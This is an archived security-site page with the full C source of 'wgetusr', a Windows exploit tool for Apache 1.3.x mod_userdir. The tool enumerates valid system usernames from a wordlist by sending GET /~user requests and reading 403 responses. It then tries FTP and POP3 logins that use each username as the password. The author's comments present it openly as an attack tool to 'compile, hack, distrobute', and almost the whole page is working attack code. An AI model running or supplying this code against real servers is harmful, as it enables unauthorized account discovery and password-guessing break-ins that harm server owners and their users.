TUCoPS :: Web :: Apache :: hack2445.htm

Apache 1.3.x mod_userdir Exploit (wgetusr.c)
Apache 1.3.x mod_userdir Exploit (wgetusr.c)



/*-------------------------------------------------------------------

 *

 * Exploit: wgetusr.c Windows Version

 * Author: HighT1mes (John Bissell)

 * Date Released: July 21, 2004

 *

 * --- Code ported to Windows with some added code,

 *     based on getusr.c exploit by CoKi ---

 *

 * Description from CoKi:

 * ======================

 *

 * This tool tries to find users in a Apache 1.3.*

 * server through wrong default configuration of

 * module mod_userdir. 

 *

 * My Believe:

 * ===========

 *

 * I believe in the current state of the web right 

 * now this information leak bug can be pretty nasty. 

 * Once you have a couple login names on a system 

 * there are many services the attacker can target 

 * to attack and work his way into the target system 

 * to get local access. 

 *

 * Program Usage:

 * ==============

 *

 * Use: wgetusr [options] -h  -u 

 *          -h     Host

 *          -u     Users file

 *         Options

 *          -f     Try log on via FTP

 *          -p     Try log on via POP3

 *

 * VC++ 6.0 Compilation Information:

 * =================================

 *

 * First go on the net and get the getopt libs and header

 * file for VC++ 6.0 Here's a link...

 *

 * http://prantl.host.sk/getopt/files/getopt-msvs6.zip 

 *

 * Now extract the libs into your standerd VC++ Lib directory, 

 * and extract the getopt.h header file of course into the 

 * Include directory.

 *

 * Now to compile make a new console app project,

 * then put this source file in the project.

 * Next goto Project->Settings. Then click on

 * the link tab then goto the input catagory. 

 * Now add getopt.lib to the end of objects/librarys 

 * modules text box. Then in the Ignore Librarys 

 * text box type LIBCD.lib to ignore that lib and allow

 * compilation to complete because of getopt lib.

 *

 * Also you where you added getopt.lib to the

 * objects/librarys modules text box put ws2_32.lib

 * in that text box as well.

 *

 * Your all set compile, hack, distrobute, have fun! :)

 *

*-------------------------------------------------------------------*/



#include 

#include 

#include 

#include 

#include 

#include 



#define DATAMAX 50

#define BUFFER 1000

#define TCPIP_ERROR -1

#define TIMEOUT 3

#define HTTP_PORT 80

#define FTP_PORT 21

#define POP3_PORT 110



void use(char *program);

int connect_timeout(int sfd, struct sockaddr *serv_addr, int timeout);

void vrfy_apache(char *host);

void vrfy_vuln(char *host);

int test_user(char *host, char *user);

int trylogonFTP(char *host, char *user, char *pass);

int mkconn(char *host, unsigned short port);

int trylogonPOP3(char *host, char *user, char *pass);

 

struct hostent *he;

char **fuser;

int sockfd;

struct sockaddr_in dest_dir;



int main(int argc, char *argv[]) {



  FILE *userlist;

  char c, *host=NULL, *ulist=NULL;

  char user[DATAMAX];

  int ucant=0, flogged=0, plogged=0, optftp=0, optpop=0, stop=0;

  unsigned int cant=0, i, user_num;

  WSADATA wsaData;

  int result=0;



  printf(" =================================\n");

  printf("   wgetusr exploit by HighT1mes\n");

  printf("  Based on getusr.c code by CoKi\n");

  printf(" =================================\n\n");

  Sleep(1000);



  if(argc < 2) use(argv[0]);



  result = WSAStartup( MAKEWORD( 2,2 ), &wsaData );

 	if ( result != NO_ERROR ) {

    		printf( "Error at WSAStartup()\n" );

		return( EXIT_FAILURE );

	}



  while((c = getopt(argc, argv, "h:u:fp")) != EOF) {

    switch(c) {

      case 'h':

               host = optarg;

               break;

      case 'u':

               ulist = optarg;

               break;

      case 'f':

               optftp = 1;

               break;

      case 'p':

               optpop = 1;

               break;

      default :

               use(argv[0]);

               break;

    }

  }



  if(host == NULL) use(argv[0]);

  if(ulist == NULL) use(argv[0]);

  

  printf(" [+] verifying list:\t");



  if((userlist = fopen(ulist, "r")) == NULL) {

    printf("Failed\n\n");

    exit(1);

  }              

  

  while(!feof(userlist)) if('\n' == fgetc(userlist)) ucant++;

  rewind(userlist);

      

  printf("OK (%d users)\n", ucant);

  Sleep(1000);

  fuser = (char **)malloc(sizeof(ucant));



  printf(" [+] verifying host:\t");

      

  if((he=gethostbyname(host)) == NULL) {

    perror("Error: ");

	Sleep(1000);

    printf("\n");

    exit(1);

  }



  printf("OK\n");

  Sleep(1000);



  printf(" [+] connecting:\t");



  if(mkconn(host, HTTP_PORT) == TCPIP_ERROR) {

    printf("Closed\n\n");

	Sleep(1000);

    exit(1);

  }

  

  printf("OK\n");

  Sleep(1000);

  closesocket(sockfd);



  vrfy_apache(host);

  Sleep(1000);

  

  vrfy_vuln(host);

  Sleep(1000);

      

  user_num = 1;

  while(!feof(userlist)) {

    if(fgets(user, sizeof(user), userlist) == NULL) break;

    user[strlen(user)-1] = '\0';

       

    if(test_user(host, user) == 0) {

      fuser[cant] = (char *)malloc(sizeof(user));

      memcpy(fuser[cant],user,strlen(user));

      memset(fuser[cant]+strlen(user),0,1);

      cant++;

    }



	system("CLS");

	printf(" wgetusr exploit by HighT1mes\n\n");

	printf(" [+] searching for system accounts, please wait...\n");

	printf(" [+] processing user #%d\n", user_num);

	user_num++;

  }

   

  if(cant == 0) {

    printf("     no users found\n\n");

    exit(1);

  }

  else {

	/* print out valid usernames found */

	printf(" [+] scan results for %s:\n\n", host);

	for (i = 0; i < cant; i++) {

		printf("     found username: %s\n", fuser[i]);

	}

  }



  printf("\n");



  if(optftp == 1) {

    stop = 0;

    printf(" [+] trying log on via FTP...\n");

    printf(" [+] connecting:\t");



    

    if(mkconn(host, FTP_PORT) == TCPIP_ERROR) {

      printf("Closed\n");

      stop = 1;

    }

  

    if(!stop) {

      printf("OK\n");

      closesocket(sockfd);

      for(i=0; i < cant; i++) {

        if(trylogonFTP(host, fuser[i], fuser[i]) == 0) {

          printf("     logged in: %s\n", fuser[i]);

          flogged++;

        }

      }

      if(flogged == 0) printf("     no users logged in\n");

    }

  }  



  if(optpop == 1) {

    stop = 0;

    printf(" [+] trying log on via POP3...\n");

    printf(" [+] connecting:\t");

    (stdout);

    

    if(mkconn(host, POP3_PORT) == TCPIP_ERROR) {

      printf("Closed\n");

      stop = 1;

    }

    

    if(!stop) {

      printf("OK\n");

      closesocket(sockfd);

      for(i=0; i < cant; i++) {

        if(trylogonPOP3(host, fuser[i], fuser[i]) == 0) {

          printf("     logged in: %s\n", fuser[i]);

          plogged++;

        }

      }

      if(plogged == 0)  printf("     no users logged in\n"); 

    }

  }

     

  printf("\n");

  fclose(userlist);

  WSACleanup();

  return 0;

}



void use(char *program) {

  printf("Use: %s [options] -h  -u \n", program);

  printf("         -h\tHost\n");

  printf("         -u\tUsers file\n");

  printf("        Options\n");

  printf("         -f\tTry log on via FTP\n");

  printf("         -p\tTry log on via POP3\n");

  exit(1);

}



int connect_timeout(int sfd, struct sockaddr *serv_addr, int timeout) 

{

  int res, slen, flags;

  struct timeval tv;

  struct sockaddr_in addr;

  fd_set rdf, wrf;

  int iMode = 0;



  ioctlsocket(sfd, FIONBIO, &iMode);



  res = connect(sfd, serv_addr, sizeof(struct sockaddr));



  if (res >= 0) return res;



  FD_ZERO(&rdf);

  FD_ZERO(&wrf);



  FD_SET(sfd, &rdf);

  FD_SET(sfd, &wrf);

  memset(&tv, 0, sizeof(tv));

  tv.tv_sec = timeout;



  if (select(sfd + 1, &rdf, &wrf, 0, &tv) <= 0)

    return -1;



  if (FD_ISSET(sfd, &wrf) || FD_ISSET(sfd, &rdf)) {

    slen = sizeof(addr);

    if (getpeername(sfd, (struct sockaddr*)&addr, &slen) == -1)

    return -1;



    flags = ioctlsocket(sfd, FIONBIO, NULL);

	iMode = flags & ~iMode;

    ioctlsocket(sfd, FIONBIO, &iMode);



    return 0;

  }



  return -1;

}



void vrfy_apache(char *host) {

  char buf[BUFFER], sendstr[DATAMAX];

        

  printf(" [+] verifying Apache:\t");



  if(mkconn(host, HTTP_PORT) == TCPIP_ERROR) printf("Closed\n");



  sprintf(sendstr, "HEAD / HTTP/1.0\n\n");

  send(sockfd, sendstr, sizeof(sendstr), 0);

  memset(buf, 0, sizeof(buf));

  recv(sockfd, buf, sizeof(buf), 0);

            

  if(strstr(buf, "Server: Apache")) printf("OK\n");

  else {

    printf("NO\n\n");

    exit(1);

  }



  closesocket(sockfd);

}



void vrfy_vuln(char *host) {

  char buf[BUFFER], sendstr[DATAMAX];

          

  printf(" [+] vulnerable:\t");

  

  if(mkconn(host, HTTP_PORT) == TCPIP_ERROR) printf("Closed\n");

  

  memset(sendstr, 0, sizeof(sendstr));

  sprintf(sendstr, "GET /~root\n");

  send(sockfd, sendstr, sizeof(sendstr), 0);



  recv(sockfd, buf, sizeof(buf), 0);

                                        

  if(strstr(buf, "403")) printf("OK\n");

  else {

    printf("NO\n\n");

    exit(1);

  }



  closesocket(sockfd);

}



int test_user(char *host, char *user) {

  char buf[BUFFER], sendstr[DATAMAX];

 

  if(mkconn(host, HTTP_PORT) == TCPIP_ERROR) printf("     Closed\n");

  

  memset(sendstr, 0, sizeof(sendstr));

  sprintf(sendstr, "GET /~%s\n", user);

  send(sockfd, sendstr, sizeof(sendstr), 0);

  

  recv(sockfd, buf, sizeof(buf), 0);



  if(strstr(buf, "403")) return 0;

  else return 1;

                                                      

  closesocket(sockfd); 

}



int trylogonFTP(char *host, char *user, char *pass) {

  char buf[BUFFER], *senduser, *sendpass;

  

  senduser = malloc(sizeof(user+6));

  sendpass = malloc(sizeof(pass+6));

  

  sprintf(senduser,"USER %s\n",user);

  sprintf(sendpass,"PASS %s\n",pass);

  

  if(mkconn(host, FTP_PORT) == TCPIP_ERROR) printf("     Closed\n");

  

  memset(buf,0,sizeof(buf));

  recv(sockfd,buf,sizeof(buf),0);

  send(sockfd,senduser,strlen(senduser), 0);

  memset(buf,0,sizeof(buf));

  recv(sockfd,buf,sizeof(buf),0);

  send(sockfd,sendpass,strlen(sendpass), 0);

  memset(buf,0,sizeof(buf));

  recv(sockfd,buf,sizeof(buf),0);

  

  if(strstr(buf, "230")) return 0;

  else return 1;

                                                      

  closesocket(sockfd); 

}



int mkconn(char *host, unsigned short port) {



  if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == TCPIP_ERROR) {

    perror("Error");

    printf("\n");

    exit(1);

  }

                

  dest_dir.sin_family = AF_INET;

  dest_dir.sin_port = htons(port);

  dest_dir.sin_addr = *((struct in_addr *)he->h_addr);

  memset(&(dest_dir.sin_zero), 0, 8);



  if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir, TIMEOUT) == TCPIP_ERROR) {

    return TCPIP_ERROR;

  }

  

  return 0;

}



int trylogonPOP3(char *host, char *user, char *pass) {

  char buf[BUFFER], *senduser, *sendpass;

  

  senduser = malloc(sizeof(user+6));

  sendpass = malloc(sizeof(pass+6));



  sprintf(senduser,"USER %s\n",user);

  sprintf(sendpass,"PASS %s\n",pass);

      

  if(mkconn(host, POP3_PORT) == TCPIP_ERROR) printf("     Closed\n");

  

  memset(buf,0,sizeof(buf));

  recv(sockfd,buf,sizeof(buf),0);

  send(sockfd,senduser,strlen(senduser), 0);

  memset(buf,0,sizeof(buf));

  recv(sockfd,buf,sizeof(buf),0);

  send(sockfd,sendpass,strlen(sendpass), 0);

  memset(buf,0,sizeof(buf));

  recv(sockfd,buf,sizeof(buf),0);



  if(strstr(buf, "+OK")) return 0;

  else return 1;

    

  closesocket(sockfd);                  

}



/* EOF */

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH